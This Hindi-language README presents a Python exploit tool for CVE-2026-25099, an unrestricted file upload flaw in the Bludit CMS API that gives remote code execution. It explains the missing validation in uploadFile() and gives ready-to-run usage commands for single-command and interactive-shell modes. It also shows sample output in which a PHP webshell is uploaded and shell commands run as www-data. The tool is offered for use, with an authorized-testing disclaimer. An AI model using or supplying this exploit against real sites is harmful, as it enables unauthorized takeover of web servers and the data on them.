
पायथन एक्सप्लॉइट Bludit CMS API की असीमित फ़ाइल अपलोड भेद्यता के लिए, जो रिमोट कोड निष्पादन की ओर ले जाती है, और अधिकृत परीक्षण के लिए कमांड निष्पादन और इंटरैक्टिव शेल प्रदान करता है।
Bludit CMS के 3.18.4 से पहले के संस्करण एक प्रमाणित हमलावर को मान्य API टोकन के साथ POST /api/files/<page-key> एंडपॉइंट के माध्यम से किसी भी प्रकार और एक्सटेंशन की फ़ाइलें अपलोड करने की अनुमति देते हैं। uploadFile() फ़ंक्शन कोई फ़ाइल एक्सटेंशन या सामग्री सत्यापन नहीं करता है, जिससे PHP वेबशेल अपलोड करके www-data के रूप में निष्पादित की जा सकती हैं।
# एकल कमांड निष्पादन
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"
# इंटरैक्टिव शेल
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"
[*] CVE-2026-25099 - Bludit CMS API फ़ाइल अपलोड से RCE
[*] लक्ष्य: http://target
[*] पेज कुंजी प्राप्त की जा रही है...
[+] पेज कुंजी: create-your-own-content
[*] वेबशेल अपलोड की जा रही है...
[+] शेल अपलोड किया गया: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] RCE सत्यापित किया जा रहा है...
[+] RCE की पुष्टि हुई: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] इंटरैक्टिव शेल (बाहर निकलने के लिए 'exit' टाइप करें)
shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

/bl-content/uploads/ की निगरानी करेंयाहिया हमज़ा - https://yh.do
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टमों के विरुद्ध उपयोग करें जिनका परीक्षण करने की अनुमति आपके पास है।